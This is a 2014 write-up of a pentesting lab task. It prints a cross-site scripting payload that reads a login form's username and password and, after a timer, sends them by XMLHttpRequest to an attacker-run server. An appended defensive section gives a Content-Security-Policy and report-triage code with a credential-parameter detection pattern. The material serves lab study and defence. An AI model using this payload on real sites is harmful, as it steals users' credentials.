XSS - posting with XMLHttpRequest(): JS for Pentesters task 13

Oct 31, 2014 • jsp, javascript, xss, security-tube

Writeup for task 13 of the JS for Pentesters series by SecurityTube: XSS posting with XMLHttpRequest()

We have already completed the challenge in which we steal the autocompleted credentials. This is the same challenge, with the added condition that we must use XMLHttpRequest to complete it. If you are not familiar with XMLHttpRequest, I strongly recommend reading the post “Everything you should know about XMLHttpRequest()” first. Knowing the basics of XMLHttpRequest() makes it much easier to follow how this challenge is solved.

JS for Pentesters task 13

Our objective is: “Write JS attack code which waits for 10 seconds, then submits the form automatically to your attack server using an XMLHttpRequest() call.” Let us see how this can be done.

Basically, what we need is the setTimeout() function in JavaScript, which executes a function after a specified amount of time. We can use it to run a function we define, and inside that function we post the credentials to a server we host. The payload looks like this:

    <script>
    // Read the username and password fields of the first form on the page.
    var user = document.forms[0].elements[0].value;
    var pass = document.forms[0].elements[1].value;
    // After 5000 ms, send them to the listening server with an XMLHttpRequest.
    window.setTimeout(function () {
        var request = new XMLHttpRequest();
        request.open("GET", "http://localhost:8000/?user=" + user + "&pass=" + pass, true);
        request.send();
    }, 5000);
    </script>

So let's see what we are doing here. First we declare two variables that hold the username and password read from the form. Then we call window.setTimeout(), which executes the function we pass it after 5000 milliseconds, or 5 seconds (the task text asks for 10 seconds; the delay is simply the second argument to setTimeout()). Inside that function we create a new XMLHttpRequest() object and use it to send the data to our server (I hosted an HTTP server locally for this).
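The defensive counterpart, as an added example that is not code from the original post or the lab: a Content-Security-Policy with a nonce-based script-src stops the injected inline script from running at all, and connect-src 'self' makes the browser refuse an XMLHttpRequest to http://localhost:8000 even if a script does run; with report-uri set, the browser also POSTs a violation report. The Node.js code below triages such reports; the policy string, the allow-listed origin, the credential-parameter pattern and the sample reports are assumptions/constructed, and only standard csp-report fields are read.

```javascript
// Added example, not from the original post or the lab. With a policy like
// CSP_POLICY the browser refuses the payload's XMLHttpRequest to http://localhost:8000
// (connect-src 'self') and POSTs a violation report; triageCspReports() triages those.
const CSP_POLICY = "default-src 'self'; script-src 'nonce-<per-response random>'; connect-src 'self'; report-uri /csp-report";

// Assumed-benign origins: legitimate cross-origin calls are still reported under Content-Security-Policy-Report-Only.
const ALLOWED_CONNECT_ORIGINS = new Set(["https://api.app.example"]);

// Query parameter names that suggest credentials are leaving the page (assumed list).
const CREDENTIAL_PARAM = /^(user(name)?|pass(word|wd)?|pwd|token)$/i;

// blocked-uri may be a full URL, an origin, or a keyword like "inline"; reduce URLs to their origin.
function blockedOrigin(blockedUri) {
  try { return new URL(blockedUri).origin; } catch (_e) { return blockedUri; }
}

// Credential-looking query parameters, when a full URL was reported.
function credentialParams(blockedUri) {
  try {
    return [...new URL(blockedUri).searchParams.keys()].filter((k) => CREDENTIAL_PARAM.test(k));
  } catch (_e) { return []; }
}

// Takes raw application/csp-report bodies; returns one finding per blocked connection outside the allowlist.
function triageCspReports(reportBodies) {
  const findings = [];
  for (const body of reportBodies) {
    const r = JSON.parse(body)["csp-report"];
    if (!r) continue;
    const directive = (r["effective-directive"] || r["violated-directive"] || "").split(" ")[0];
    if (directive !== "connect-src") continue;
    const destination = blockedOrigin(r["blocked-uri"] || "");
    if (ALLOWED_CONNECT_ORIGINS.has(destination)) continue;
    const leakedParams = credentialParams(r["blocked-uri"] || "");
    findings.push({ page: r["document-uri"], destination, leakedParams,
                    severity: leakedParams.length ? "high" : "medium" });
  }
  return findings;
}

// Constructed sample reports: a task-13 style exfiltration, and a benign call to the allow-listed API.
const SAMPLE_REPORTS = [
  JSON.stringify({ "csp-report": { "document-uri": "https://app.example/login",
    "effective-directive": "connect-src", "violated-directive": "connect-src 'self'",
    "blocked-uri": "http://localhost:8000/?user=alice&pass=hunter2" } }),
  JSON.stringify({ "csp-report": { "document-uri": "https://app.example/login",
    "effective-directive": "connect-src", "violated-directive": "connect-src 'self'",
    "blocked-uri": "https://api.app.example" } }),
];
```

Running triageCspReports(SAMPLE_REPORTS) yields a single "high" finding for http://localhost:8000 with leakedParams ["user", "pass"]; the call to the allow-listed API origin is dropped as rollout noise.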

Note:

1) While playing with XSS challenges, it is always recommended to use Mozilla Firefox, because Google Chrome has a built-in XSS filter that stops us from executing arbitrary JavaScript even when the page is vulnerable to XSS.

We hope you really liked this challenge. If there is anything you didn't understand or want more clarity on, please comment below and we will be more than happy to help. Also, if you find a better way of solving the challenge, please share it with us; we are happy to learn from our readers too. Happy pentesting!

Anirudh Anand

Head of Product Security & DevSecOps at @CRED_club | Application Security ♥ | CTF lover - @teambi0s | Security Trainer - @7asecurity | certs - eWDP, OSCP, OSWE